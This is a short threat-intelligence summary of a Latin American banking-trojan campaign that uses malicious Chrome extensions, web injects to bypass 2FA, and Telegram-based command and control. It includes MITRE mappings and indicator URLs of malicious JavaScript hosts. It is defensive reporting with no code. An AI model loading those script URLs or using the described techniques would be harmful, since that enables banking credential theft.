Threat Research

[Cyware] Unveiling the latest banking trojan threats in LATAM

Cyware

CyberCartel is expanding its LATAM campaigns by leveraging Malware-as-a-Service to deploy banking trojans that target Chromium-based browsers through malicious Chrome extensions. The campaign uses web injects, Man-in-the-Browser techniques, and Telegram-based C2 for data exfiltration and updates; users are urged to install extensions only from trusted sources to mitigate risk. #CyberCartel #Caiman

Keypoints

    <li CyberCartel uses Malware-as-a-Service to deploy banking trojans targeting Chromium-based browsers in LATAM.

    <li Malicious Chrome extensions can steal credentials, capture screenshots, cookies, and inject phishing scripts.

    <li Web injects enable bypassing two-factor authentication and compromising user accounts.

    <li Telegram is used for real-time updates and to communicate with C2 servers, enhancing adaptability.

    <li Campaigns focus on financial institutions and government offices in LATAM, with extensive regional activity.

    <li A variety of technical components exist, including manifest permissions, content scripts, background scripts, and a Telegram-driven C2 approach.

    <li Underground marketplaces offer template builders that lower the barrier to deploying malicious extensions and campaigns.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Link – The Victim unknowingly visits a phishing website and downloads a file. β€œThe Victim unknowingly visits a phishing website and downloads a file”
  • [T1056] Input Capture (Web Injects) – Web injects and Man-in-the-Browser activities to manipulate web sessions and steal credentials. β€œWeb injects are back on the rise. They are powerful malicious tools integrated with multiple banking trojans that permit a threat actor to bypass two-factor authentication (2FA) and compromise a user’s bank account.”
  • [T1071.001] Web Protocols – C2 communications over Web protocols (Telegram for updates and data transmission). β€œTo ensure its persistence, the malware employs a flexible command and control (C2) system and adaptive configuration, often communicated via a Telegram channel.”
  • [T1041] Exfiltration Over C2 Channel – Stolen data is transmitted to a C2 server. β€œThe stolen information is sent to a Command and Control (C&C) server”

Indicators of Compromise

  • [URL] context – https://facturacionmexico.net/ok.js, https://dlxfreights.site/mx/sbi/main.js, and other related domains
  • [URL] context – https://css.imagesccs.com/jquery.js, https://www.cssangular.com/jquery.js, https://www.angularcss.com/jquery.js

Read more: https://securityintelligence.com/posts/unveiling-latest-banking-trojan-threats-latam

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint